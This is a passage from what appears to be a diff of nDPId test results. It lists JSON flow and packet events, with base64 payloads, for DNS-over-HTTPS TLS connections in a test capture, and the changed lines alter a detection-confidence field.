N0PHL56xSrx12FRC1SCfzqnzT4BREj4eRgr5sVcZJpcqB\/DJ16zqD31Cdz1F6VAt5mHD5hgyW+BhQO6jtpBgHqFisMVPWD18uXILfOEcLKzexTq0enEqkxPPztMgd3lKJoJoLn9D15r82RK7HhKsmZiDKUuCdmH3DjKAbtkj9uSMWDKDEZ7ALu1TTrcVpMz\/u916YJjVrsJ4zke1Y\/PKCwgQji1xX0Q1uKg+Qhmzj0YA6C\/ZB8hBOasuUjTVZER2lXZpSogcQcgdsx7P47du+ZkiOIevUp1ckurR953sVaD3ci+d3blInJn3V2H1nd41bCStQkPyhbrCiGVWDvB4NjqVSIh6ypL1X2Tez7o9uIFek3e\/KdLnjoJYgUoUCdBCeRBScD+0K+sqvZzi8z7OnTzhYK\/aCGv11HpK88nhB\/fu4rCw6Clf8iUvZmwOIdmA\/mXVezV7u9+Y+L4mJOPGGV+Ie7YQjoii0W0J9zldsek4JrCNAfpxxvmfZTghYCrVQJNlGcKyp+LE4s0nXJXsv8iOBmDMV\/qiHS\/RfVp0Al+GVjFpErgTgXH8uFG0eZxhSX5TnPtc5X3FjIRORKWkOyTX+MlnBU+yWrj3iWALBhonn7tNa85eK0vFJHHFGyQm3hMEk7psuYZdoK61bs1KKeUi4RTDX274TTDnDx\/vYrXCGEMbInwJeEUUq10Y0AUNC+ikXVAlZm5\/6b3SLH1mmyzy5AwgfbHNdBdm2h13eHYAHANjDp++p3nOFwMDARmCniHbpabBh0wmz+4GvD7gEaHTo1WwpHFuO0rRndT2cE+rB3NSEIZ\/OfAhdTV9eadRkxEucZ2zRFouLobhVj7VuatuyZROJYubLXxY0L2AD9VfNIXMUeRNHnXvmwyBiqm\/8ZuzuiYxPVzYGJuS41vYyyQm1ND0\/vWricRWNYCIXjgbSqk6PFYh1FVGYRV8SSt7kE3Z3NtrXGW3LuaKD8ymXSg9dYJ9GwRxcPV5is5NEijit\/K0HuZymRnz0biX0ibyZ3bQdAu+3E+KHkL1KMxQnoIP\/X4lavINi95Z\/1+WkK1enaEAwf7tuLJlq5tLt+JOe3OVPJYXu+hVDAzfIFEvugfqxQ4aetpIOYSy0uy\/8Blk6BuP7s0kZRcDAwBF06XPl0W4alPWKLcZUBV1\/sR9gwxnLLJ0WJlMdAUkQ1CCMVwzdsK8lkkZUPttQ7nY8WKaipYb2yNRvSYmxfuU2S\/nIBiL"} -00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739390933,"flow_last_seen":946739390967,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":3394,"flow_avg_l4_payload_len":1697,"midstream":1,"thread_ts_msec":946739390967,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739390933,"flow_last_seen":946739390967,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":3394,"flow_avg_l4_payload_len":1697,"midstream":1,"thread_ts_msec":946739390967,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":946739390970,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739390970,"pkt":"REREREREZmZmZmZmCABFAAB4ddJAAH4G2DAKAAAB2akUF4T0AbuSPuSllAS3MVAYAfWu5wAAFAMDAAEBFwMDAEWr1XNIOucPlOXvVPAlxCVPjuVei0Kv510pke\/KbmmoYPXHQYgn\/dXPL9SYgvzqDxY7NHWdbkgaLyLveAQw2UhT5DxScM0="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00854{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":946739400294,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739400294,"pkt":"REREREREZmZmZmZmCABFAAFMOfJAAH4GNZwKAAABkv84YqrGAbtdpqacr2JwdlAYAfaNXAAAFgMBAR8BAAEbAwPHJz7Bz9zA6vh2mAtXguxbTFdhb5D1tFb1Dou8iu1ITyDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZG9oLmFwcGxpZWRwcml2YWN5Lm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACADmPqzqEwwIPykBECgQ7iBmKhoGpqhv77PEzGKWzxqPw=="} -00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":946739400340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAuAAABAADgGq1qS\/zhiCgAAAQG7qsavYnB2XaanwFAQBBOXkAAAFgMDAHoCAAB2AwMDsBehTQYQ\/iH2Yhpyf+mLl1C35r3Ho6TovknKnjr8riDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZRMCAAAuACsAAgMEADMAJAAdACBo4BH+AA5SyDExxRIaGpKShy1vmsbixTg2m2T2NedPDxQDAwABARcDAwAgvk7ezJo1JZP9LjmZFBvdhSYoK5Td7g7\/A2oIAgI6osUXAwMJ2yS0n6M3Ydri+rIgYVXd+jwuTvP8FF1HMS4hAE9YkVd0802YEbU3pHhUuQANn0vXApBPxbj3FV9uCCuIZCOL4zY7+k\/N9QNOxO6wgqwyjpqF\/MSuGzGbkODdKsjr3MXDrOEDT8UY4Cf7sbDSqOIkajzwlllabjLyw\/JVxOtUepEpKMKQWPduyvGLlnSE+4Pi9X1F5dljLFonfMSt9epl2VwSF1nq8Zl4KKstqyQuG\/zmvd2vjAUtpZ7bRJhqcQEAuZwHSvB\/MtIxXfAzVeG47SjsazBlsuRoBS3fTomilsUH4J13\/0ChaLizKxEdSZ2w2K00iVdJ7hQkti8Yk+XaV61AEfwts012l3Az0Ul6QGn+ovAsikUEMTOdEJmAEExk\/NRuYh4YJeat0fT6qqxPxOtp8iJmxclZOIdEdtKfFRlb\/Q3pIWRMmx+BKdsNQm6TtOsUrqgzJEovgnDvaBUadejY9LBbNHqxMK2V6F7gbnGKVjBjB76l32rCkAGXZjYpu99n3pc8VsX6toeCgNv6uuTb2IhBkEMBsiXbrPavcq8F51o9cjY6ri1T23vFWkuEBAAWOdINJTApJO1joFFgFxyMMNnlCpJoVnqu0i\/rinlDFg7S9CtMSJ0Ubb2fcMiTZVA8sg8c2grczf38tyMaZ9tLwrWkyrDaM66WF+r\/Smzgjb3lUh8vJ3yJCEPyKRtiP8bLVA86MJJR6swDhhbPo5TZc3HPN3paBxU5U9DTyACxQnk6EYqYsA8ZokkmQV3rXvd3nlNnXQvP8iTrcL1LydrbGPEmcxzftt97lwfP6IxI3O3sNlij9LY+i3W9W6NVdJf0gVlPHB34DPsUDzGCBqeTZuUD+fgbA8m0vHZeGLaeh2n\/ATJxgu83kBANWSs0j4JxeZwkxA4LQE6k9KdadeiuFQWUUsCMoytEmeRS+e2CKC26bva8V4F4G5ILpiDrVUa9OPpnIugEC\/pCpbfo45ejO0OYsjmcSB9VHs67ODTG8tfG\/HSnEWghmAKv96DqsZyAaTmkT0JkH5FkXlCzBQ8v8o8b6rSE0lRW\/lesYflMu+sWf50UV63CFJyy6fgpaJPxCw8SCnSJ9Wfe5036kFXS9TxM7sPwyghnAoVeaf7Fck3c5pxthPEaz67tzSOMeekQJOQi7xMcEt3jcaR5XiiPfvpfvbXLOiTYOMcz4nBR25XpUeWEHByMxgi+V+13jYe4gb5oIp\/OYL+ldNmokkEz0NkrXv9PYcDVxLHdE8YvZjA+Y3MOkWFCk9BM\/Rn01CyqbL8CmN\/DvCsMgWqz9BmPnWHQOqMnYSTykXgSFe9FyeKoNSng2DkGXmS4Ish3yys0i\/QIlGlT9piLrC2UOh5tHQYhdkxZTzWOLoSNhJgdpKplLIWgmFyDHNvrhDmwq50tATdlnRMhe0ry66PsM3l0lek7HZ1iPpCZ7a660QlaPE9SZFbRD2hjaqHqZrlPWWwgi6eHfY0gu5vY3pzyuUgNc+IY+oeDLEyaB3ysUDN7Sr1IZYyAtSiOnN0WLtHIeg9uqvR4NEBF0XEfeRxZT0n6RrygJ1nWV+kailDfsz4vklZfPYltDFOyTnwOyyzBO2WpBi+QHoJdR5a+ci207f4TAHC5iWzq9Ov\/CBA21s0iwXcKHtUUuFkXfGsSTcHlMRdWRoqqdrwRmUkHc5FaU6RNse5tyVEdBKfOwfXkDw8I22zIDBmTO4YVBH4Dzw0SEVpSPVqE8m2STbZxIzmRtVGFxbw45tbGu6NUyHfb6XRJMV4vKdl8h+lVfwIggGdSBSYb\/J2WkIjXI5Z1\/s5OXr498b\/Ul1cfjj192V+QV7YEDHDJ0wunGAConliOcHcZIZrOpVaNMM7NeTBxiiUgynpVWjltr\/LQuk0Pld3mEIxmwXht0KmUnXyCvTBJgPYroLRuneYRQPZ1JOgkt\/kdsQBmYrZvkRHKWFwNxkLAhypRqmOoE6eO9TYZgchFtH7ouVK4C6vE0wlk\/wNdktEQVjtjEf81TNo\/lytMdDE\/EAGs9weyRqd\/Hmz5\/6yLIgAilI7sqB7dEuE0iiOXk4T95pQbOjvSnwI7M4B7Q3oDNdWJJRZNp2tZGQNCVfj0OFzEKSZbanefGx8qbWewy7Iup5wriwLbBG\/B7ZFkxdmUnEdpL4pTOBRMxGDxRjV5ioqpujq6Ef07dgH3IGRgJHxsp9J2Qlj8S7lCwwOsTDkI+PhLsXzzIudX\/ZiC+lH4Tm6LciXTHf3hDkr34EJfXHJ2WpSeeCsJZBkZx0OJpBR3y1cyrhzb66IxG0uSRnndSXXBNAmD+Gghsj7Kg4E50GUXibzQRhDNRs87q1TvRNjyYI9h\/opUmKnHAkXz4SItfTxaX2LIVbjHXv1XndcnuHwhJgHhiVGswZvXlXVlX8K4fGgnhgpZ7MSQN2lSYmnj2j7A1n8u\/xbD+JqpDU+SOMNWtYlDQ0M+WzoE91BSSQYj6pIr9DxppqLCgUAfJpZxJ8YTmINwfhMZVMPhUF+vys97o5XgriLF7uzxf2I4907edC79eKV1Vf3Ui9qrIThroIUvlpq69fVaplHqZXdbs+zwj7e2bSPVWUVR0G4cA3aU9fbVCQvpl3a\/SuOWAYL5O1\/gu5GJXDImY\/gEO1xe+OVqS2aF0XojyeNtILIeW1nDYyaMtRMD0J7qIxHbffBANlspXb0qgGJLXRsdV8\/\/lQ9fV9vIoHgsaUsdWxpVNTmqaQBhX+l7X3gEUnrZ2jVkY6Oh5aU+eYdso\/pGSL+gHQ1M1e6uj4SYxfEhZHY1voW\/zrjGcvC2BmpxPhTrZRQE7Z8GgjqyG\/K9Af758C5W6bNB\/xr5yeKDI\/G5cyIFeblO2dJmHUb92Zs9qV6hqZGonI7Nft2QsKRvSQjz6cpX\/ZVUA+5e0AnpZpXEPBjJfZQ24FXs9QBvGk2XnWW8Dboig8I5f6Aa0W91KG5sO3Doyp3jU3SQ\/ah58ZIaBgplOwc2\/XF6kzcQLnHv217TTOCL7ScT90UL1M8uz6xGKTqy83KCKRxOqCSmaU4GimFhTvfwqF7ljKegUp6S9OeYOOt+VYDC0UeVysX6yYVwgIBxXA8D51WCmgGdUznHhIQtp1cWWN2T6pBItiud+sR32LmiE5tMUZYbwm2xu\/Nih47FXpRY2xq\/SEOEBCWv+pct34wnV4RwGw\/IvRU9BDEL1I7Sc1UFJRrazHP37UtPsKE1Z1llTnptgsNBNnDluQKifySFsqvXdr8Wwvn6V56upoM0fLxPG\/\/F6OVsniKNnqDtgpVsVi86SZ5O9M+5OvtEmUD8hQl4gxL2QqLYZIWV6vswIZSATUQuw0pUlpiEaj4PymXC95\/5pMEQnYMyOGFn2xcDAwCAmr0Gh4ZNVa+hT2Dwwrpwf9EMB3SMWmSnSLNfZ1YP9lq\/H3H\/YzkchSbogwVw+NXvSKa3Q5dILWczbhkBruescLznbqY0DC+TTlEnvK+mjob5wwR3lQsp8odDMfmh22P3SAFc1ZvCoRb2GkaVN69lxvgMa3mO7aDcfiHSTbC8C9cXAwMARePoOyVbKZG3xXgBtpg5jANBShpYQchD5Po7jBmjBEffrOCijDBbST3aotIn5HBfw8iB7gJCrbmWU17Z2peLW9KOid+9"} -00956{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400294,"flow_last_seen":946739400340,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739400340,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00956{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400294,"flow_last_seen":946739400340,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739400340,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":946739400340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAApAAJAADgGtq+S\/zhiCgAAAQG7qsavYnvOXaanwFAYBBNMgAAA9gAAAAAA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7580000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":946739400581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"thread_ts_msec":946739400581,"pkt":"REREREREZmZmZmZmCABFAAFHpuhAAH4GfboKAAABwUZVC9OUAbunNzlTos+VOVAYAfbYRwAAFgMBARoBAAEWAwO9Yq6mzn6Kf+YkY+w4Q\/vo+7yhlWhjohroCY4Mal823CCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACnAAAAFgAUAAARZG9oLmJvcnR6bWV5ZXIuZnIABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6wutcF723xZ1OaF0ooDfgy7xahyBeOD2x7PNk\/t6gG4="} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7580000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7580000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":946739400612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAuA435AADQGgOvBRlULCgAAAQG705Siz5U5pzc6clAYAfXigAAAFgMDAHoCAAB2AwPum08l8a\/xsIE7sf4ouj1cFjIcJvTzL6IcltC8x2MVWyCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XxMCAAAuACsAAgMEADMAJAAdACDFCe5GcFoAINJ8W\/U00yxwlYg7Wtx0yaBhsZxlJVHAahQDAwABARcDAwAgjb6\/bt9RU3n7f\/XK70kHoogWe0pWzujxYyDQFCzDS9sXAwMKFyLHVFWncnvuWpj00oLMIDtr5tAZiqfcqzwOOMNYqfKKQHH219coqZSx1dHk2hi5d1LB3GytI8vYkc59i5RQQDbXAHUuezlbBvO8F+B3yrBrypISyNX1A4sx1E9x9g092nWO74tZVT++3VZ86RoDvvF0ZUqxTSHr+1nR9kKZh0N5lUkvTu0aK5ORhVWNfmq0hwnrW5s27rBfHFIN8y0h27yxFq4SIl7wwuk6Mq7vkrvqIsM5xqyCc\/9Xu0OqSF3zUNnkItIrGQeIJp3LGwwIhQxxQAsnuWmwcXNFRqEzMD5jbEtpKYkHahCBuU\/B3PKrCTX8+YsVVjGS5Qrjne3Kr5FWp6nlPfIH59LkIEasv75h75FcjD+7wr54z1JIPpP7ZrLR5PywuD6f88xvloKZN+WwiXGAie649c7JKsyGwCn507cb9CeSrJLhgRoQlUSUEBlnxiSHhJ2mw9owqvmzHqRqTxGrXh9qTPYDQpk5QRLmSGX3D7g6VS6CrNB+GfCK6SPMgzdR+k8lAJJdHOY0ZZdv+Ya6nA3r8RDkXrspyuJsV4QMPLAoNzQvGen9CeK5JxcSLtBMp5q0B1DBO5EIcsoLQQ6lCwlPm8U6NZmJK6eA9zbgzP80r8LRBBpZx1beD6mw3j+TpFAy+igQ8+ETtD4YPbZPWCgC6xVG0u33AvPq8sRsHwGqnzJp1MW\/CDUHInzc9xT9j80aqrzF0XcmMIsrs4KNMQ8QDQCsJmct9U0iMbkLXGLFA32BoRsU95KY+6gDs57twsE3JaqfYSuTq\/Dlicgoiy07U8DZsIf1tKivKbhBZS1qr1PaAU2W3RuJy+8koP4fg1irOvcozqBrDOixlNBNoG8ob7RGwcT3Z0ArR3tWTeHxhQydU29KSYU8HwZniOUgn1K8cz071\/P8S72m5u89j2RZsoG54t+A\/1vLyZMsjOXjwepn9YLOohxBXEIx84KuxUh3bAga+k\/yE8GW5vng0KtP1aBiU4Tc6A+REN2DA3ij6lHoD2sFhJA2fLcssM6OpAK\/moM166igfSm3LqGC4gK+TDj4gtClJchy8bvN8tctQ8iFjFj\/6qv7lxplsZ49PvHPbnKju\/tev2fd5dDj7QcMjqNvhblPBUZ32SOOjxBH3RE7aBpBLMz7W1\/NpSWcgM15pyZsPx8isO02KbyH6gAHIs+ZEGj61i6mnrDsMNesZUMUM55VeDXhdpD8kmxGJpLZ3bsJ69dZmjx3Rf6Zgw2KbXhlm6KMoEBrRSd15+xgTimUz9H5N6PvNLfaRiGX8r4RI6AIPrxRNjrz1JtdmeN1NzdaLUaHCvnql7jjxoX9Sn8xtUQxnkcUzYoweeIrvi9ulLP7ucnd54pGXhyPpURQBCM2nU9nbu+b6Pbj4vx7uFCRh\/lkqhRWVdTtE5uZmH8x4uxAXTdo\/R5oSgAkEsgUzYbuz4+G0Ch0T6jruu4T9ekEthrBCQJjN3fHGBcpM7AMfx+FKZas1DTjRC6L41JS2ixQWYjQbws0Hx+sBQGG6PAX0ilnkOFTCqdi4OZ+YhHBZ3aa4TDran\/FLmLs4pdGLb\/oqLyzwsvNQ7jdGUh2A89lsoDzqOObMQCUrWrG7EbmBEy\/sbHnGgiIy31PynXQexT3lSGWXsVy54UK1SdBZ18JpRAq1XaEcJZV9BqOYiMFEVnHR9zwIUFWwIjG0UpAOSNn7blveeCwW\/YovVsVKboGuW3yyReDZYyNgSvRfgvPpiG+pklW5Ihw+wYJ1sPXS0I2yAnATL00hg3Bnv3J6\/Z\/+4vJOHMRe5zCkPZYK8w\/AOnTp5VZVUALMm2aJruUFq4CXZyWMk1kbL3XBzpFB\/roJe8IiU+Kt9kQ449THNAxRUoavQeSeXnuQSkwDYmI0buLWeiaEzMUY5OavuLtDgD4c+avQlGrce7Ozez1RlLgPgV+i3DcrjoWos6tTeu8g4pr3NuCp14nKYaub7Vt2s0JPBPZqY\/MuyLA\/e3Fr\/OMlh\/EauRFDsRaqiHBJ2mP3NA8\/ZyaQQcWAIVjHSjsVGu2nQBYWjKsZ8mKcS9VpMr9ndCkWOs5Sz5zWAutH8paKKKAqBcvloCRHOWIfcJ9h9uc3Lq9DYb+le+8B4yxwh7qQJOXNZwdUQbb19fMRPNRiaEzON5GpXpNywN75iIVBnfCJp5hZfV7tIfK22ta\/Z6stqDCIyk+p27DCeEPYmTJDSSHKNbedRdn0\/iB9LUsBrCmi7IRRBlE2Tr8s2JDIPOoL9S4j6C6g1r3fpCuw4mXBrcGCfNjDw6rPYEplJqhIiTO+juQuxn5Prjqj21RvbfTbyzJIvTV7a0Zy5SJ1YWQ9z3NLs75HRnYaEIc3G103AKPkytzCjXINk0eKUkCZXrW9QupQw5YZCi9c+zr9e6Nsrg4KBkr13ePLbPEqhzK0TgphOe\/BgDw39ES3e0uIM